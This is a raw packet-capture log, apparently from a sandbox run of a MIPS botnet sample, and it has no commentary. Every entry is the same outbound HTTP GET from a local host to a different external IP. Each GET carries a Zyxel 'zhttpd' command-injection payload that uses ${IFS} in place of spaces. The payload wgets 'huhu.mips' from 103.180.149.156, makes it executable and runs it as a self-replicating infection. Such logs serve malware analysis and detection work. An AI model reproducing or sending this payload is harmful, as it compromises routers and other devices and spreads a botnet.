                                                      Feb 2, 2024 06:35:50.584019899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3861192.168.2.145972614.74.147.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584043980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3862192.168.2.1449692179.121.216.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584076881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3863192.168.2.1450752176.31.10.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584130049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3864192.168.2.1433972166.66.149.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584163904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3865192.168.2.1456494179.100.93.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584218025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3866192.168.2.14547081.188.34.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584254980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3867192.168.2.1446192126.228.110.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584280014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3868192.168.2.143552699.168.167.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584325075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3869192.168.2.144220819.21.100.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584358931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3870192.168.2.1438130144.25.68.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584408045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3871192.168.2.143613417.142.197.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584451914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3872192.168.2.145779869.197.255.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584491968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3873192.168.2.144639473.186.233.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584527016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3874192.168.2.1453926134.27.47.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584556103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3875192.168.2.143826059.146.93.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584603071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3876192.168.2.1440310156.184.37.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584640026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3877192.168.2.1438704209.179.98.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584681034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3878192.168.2.144622437.16.74.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584712029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3879192.168.2.1434556181.216.28.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584754944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3880192.168.2.1443152150.244.4.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584779978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3881192.168.2.14391189.126.160.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584813118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3882192.168.2.1440974129.105.110.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584863901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3883192.168.2.1439450221.165.105.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584924936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3884192.168.2.1434394130.39.140.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.584976912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3885192.168.2.1448306171.166.253.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585009098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3886192.168.2.1451134192.202.89.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585057020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3887192.168.2.145458048.16.215.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585082054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3888192.168.2.145648485.27.90.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585134029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3889192.168.2.144299896.161.226.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585182905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3890192.168.2.143488497.163.166.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585227966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3891192.168.2.144479480.192.140.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585259914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3892192.168.2.143596844.131.145.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585290909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3893192.168.2.1455116104.80.22.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585333109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3894192.168.2.1447628174.214.241.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585369110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3895192.168.2.1450390193.64.181.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585407972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3896192.168.2.1451558162.131.175.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585462093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3897192.168.2.1454672156.11.61.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585508108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3898192.168.2.1458220221.172.178.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585535049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3899192.168.2.1451802162.159.187.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585566998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3900192.168.2.1435712208.206.72.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585597992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3901192.168.2.144528896.131.134.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585644007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3902192.168.2.143306667.20.204.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585670948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3903192.168.2.1448136141.193.179.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585705996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3904192.168.2.1434874173.212.254.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585776091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3905192.168.2.1439006164.244.158.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585807085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3906192.168.2.1457250204.157.94.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.585859060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3907192.168.2.145437497.156.252.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.589066982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3908192.168.2.145846871.153.168.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.589464903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3909192.168.2.1453290209.83.34.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.589490891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3910192.168.2.1433546153.201.116.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.589543104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3911192.168.2.144440277.19.96.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.589575052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3912192.168.2.1451406170.235.239.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598212957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3913192.168.2.145720284.70.246.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598261118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3914192.168.2.1453602216.40.146.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598290920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3915192.168.2.1440576187.133.0.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598373890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3916192.168.2.1443914161.157.28.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598383904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3917192.168.2.144445874.16.148.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598424911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3918192.168.2.1447782121.13.117.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598449945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3919192.168.2.144902623.7.195.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598501921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3920192.168.2.1448626153.121.149.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598532915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3921192.168.2.145081262.30.152.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598587036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3922192.168.2.1442340147.208.2.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.598653078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3923192.168.2.145575675.212.37.23443
                                                      TimestampBytes transferredDirectionData
